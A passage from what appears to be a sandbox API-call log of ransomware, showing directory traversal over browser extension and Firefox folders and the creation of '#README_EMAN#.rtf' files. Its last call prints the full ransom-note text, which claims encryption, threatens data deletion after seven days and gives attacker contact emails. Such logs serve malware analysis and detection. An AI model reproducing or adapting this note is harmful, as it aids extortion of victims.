Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\", cchCount2=130) returned 1 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\", cchCount2=130) returned 1 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\", cchCount2=130) returned 1 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\", cchCount2=130) returned 3 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\", cchCount2=130) returned 3 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\", cchCount2=131) returned 3 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\", cchCount2=131) returned 1 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\", cchCount2=131) returned 3 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\", cchCount2=131) returned 1 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\", cchCount2=131) returned 1 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\", cchCount2=131) returned 1 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\", cchCount2=130) returned 1 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\", cchCount2=130) returned 1 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\", cchCount2=130) returned 1 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\", cchCount2=130) returned 3 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\", cchCount2=130) returned 3 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\", cchCount1=132, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 3 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\", cchCount1=131, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 3 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\", cchCount1=130, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 3 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\fonts\\", cchCount1=45, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 3 [0280.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 2 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 3 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 3 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 3 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\fonts\\", cchCount1=45, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 1 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 2 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\", cchCount2=118) returned 1 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\", cchCount2=118) returned 3 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\", cchCount2=118) returned 1 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\", cchCount2=118) returned 2 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\", cchCount2=122) returned 1 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\", cchCount2=122) returned 1 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\", cchCount2=122) returned 1 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\", cchCount2=122) returned 1 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\", cchCount2=122) returned 1 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\", cchCount1=126, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\", cchCount2=122) returned 3 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\", cchCount2=134) returned 3 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\", cchCount2=134) returned 1 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\", cchCount2=134) returned 1 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\", cchCount2=134) returned 3 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\", cchCount2=134) returned 3 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\", cchCount2=135) returned 1 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\", cchCount2=135) returned 3 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\", cchCount2=135) returned 1 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\", cchCount2=135) returned 3 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\", cchCount1=135, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\", cchCount2=135) returned 1 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\", cchCount2=130) returned 1 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\", cchCount2=130) returned 3 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\", cchCount2=130) returned 1 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\", cchCount2=130) returned 1 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\", cchCount2=130) returned 1 [0280.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\", cchCount2=130) returned 1 [0280.255] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\mozilla firefox\\#readme_eman#.rtf")) returned 0x20 [0280.255] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\fonts\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\mozilla firefox\\fonts\\#readme_eman#.rtf")) returned 0xffffffff [0280.255] GetLastError () returned 0x2 [0280.255] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\fonts\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\mozilla firefox\\fonts\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0280.256] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem 